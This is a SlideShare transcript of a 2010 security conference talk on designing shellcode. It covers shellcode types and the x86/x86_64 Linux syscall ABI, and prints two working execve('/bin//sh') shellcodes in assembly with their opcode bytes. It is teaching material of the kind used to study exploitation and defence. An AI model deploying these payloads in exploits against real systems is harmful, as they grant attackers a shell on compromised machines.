Design and Implementation of Shellcodes Amr Ali Cairo Security Camp 2010
What is a shellcode? <ul><li>It's bytecode
Machine language
Compiled Assembly source file
A string of mostly unprintable characters
Opcodes that the processor executes directly
Mostly doesn't contain NULL bytes
It is position independent </li></ul>
Types of Shellcodes <ul><li>Local shellcode
Remote shellcode
Download and execute shellcode
Egg-hunt shellcode
Omelet shellcode </li></ul>
Local shellcode System + Normal User Privs Shellcode Vulnerable Root Process System + Root Privs
Remote shellcode Network Shellcode Vulnerable Remote Service System + Root Privs
Upcoming SlideShare
Loading in...5
×

Design and implementation_of_shellcodes

1,463

Published on

0 Comments
5 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,463
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
89
Comments
0
Likes
5
Embeds 0
No embeds

No notes for slide

Design and implementation_of_shellcodes

  1. 1. Design and Implementation of Shellcodes Amr Ali Cairo Security Camp 2010
  2. 2. What is a shellcode? <ul><li>It's bytecode
  3. 3. Machine language
  4. 4. Compiled Assembly source file
  5. 5. A string of mostly unprintable characters
  6. 6. Opcodes that the processor executes directly
  7. 7. Mostly doesn't contain NULL bytes
  8. 8. It is position independent </li></ul>
  9. 9. Types of Shellcodes <ul><li>Local shellcode
  10. 10. Remote shellcode
  11. 11. Download and execute shellcode
  12. 12. Egg-hunt shellcode
  13. 13. Omelet shellcode </li></ul>
  14. 14. Local shellcode System + Normal User Privs Shellcode Vulnerable Root Process System + Root Privs
  15. 15. Remote shellcode Network Shellcode Vulnerable Remote Service System + Root Privs
  16. 16. Download and execute shellcode Any Medium Shellcode Vulnerable Anything Payload on the Internet System Downloads Runs Payload
  17. 17. Egg-hunt shellcode Vulnerable Process Egg-hunt Shellcode Shellcode Unpredictable location
  18. 18. Omelet .....?
  19. 19. Omelet shellcode Egg-hunt Shellcode Shellcode Chunk Vulnerable Process Shellcode Chunk Shellcode Chunk Shellcode Chunk
  20. 20. x86 and Linux kernel ABI EAX : Holds the system call number. EBX : Contains the value or address of the 1 st argument to the system call. ECX : Contains the value or address of the 2 nd argument to the system call. EDX : Contains the value or address of the 3 rd argument to the system call. EDI : General purpose register. ESI : General purpose register. EBP : Base Pointer register. ESP : Stack Pointer register. EIP : Instruction Pointer register.
  21. 21. x86_64 and Linux kernel ABI RAX : Contains the system call number. RBX : General purpose register. RCX : General purpose register. RDX : The 3rd argument for the system call. RDI : The 1st argument for the system call. RSI : The 2nd argument for the system call. RBP : Base Pointer register. RSP : Stack Pointer register. RIP : Instruction Pointer register. R8 : The 4th argument for the system call. R9 : The 5th argument for the system call. R10 : The 6th argument for the system call. R11 – R15 : General purpose registers.
  22. 22. x86 shellcode .global _start _start: cltd # 0x99 push %edx # 0x52 push $0x68732f2f # 0x68 0x2f 0x2f 0x73 0x68 push $0x6e69622f # 0x68 0x2f 0x62 0x69 0x6e movl %esp, %ebx # 0x89 0xe3 push %edx # 0x52 push %ebx # 0x53 push %esp # 0x54 pop %edx # 0x5a movb $0x0b, %al # 0xb0 0x0b int $0x80 # 0xcd 0x80
  23. 23. x86_64 shellcode .global _start _start: cltd # 0x99 push %rdx # 0x52 movq $0x68732f6e69622f2f, %rbx # 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 push %rbx # 0x53 movq %rsp, %rdi # 0x48 0x89 0xe7 push %rdx # 0x52 push %rdi # 0x57 movq %rsp, %rsi # 0x48 0x89 0xe6 push $0x3b # 0x6a 0x3b pop %rax # 0x58 syscall # 0x0f 0x05
  24. 24. Information <ul><li>Smashing the stack for fun and profit
  25. 25. by Aleph1
  26. 26. http://www.phrack.org/issues.html?issue=49&id=14
  27. 27. Shellcode: the assembly cocktail
  28. 28. by Samy Bahra
  29. 29. http://www.infosecwriters.com/hhworld/shellcode.txt
  30. 30. The Shellcoder's Handbook </li></ul>
  31. 31. Thanks <ul>Questions? All presented material today will be available on my website. http://amr-ali.co.cc </ul>
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×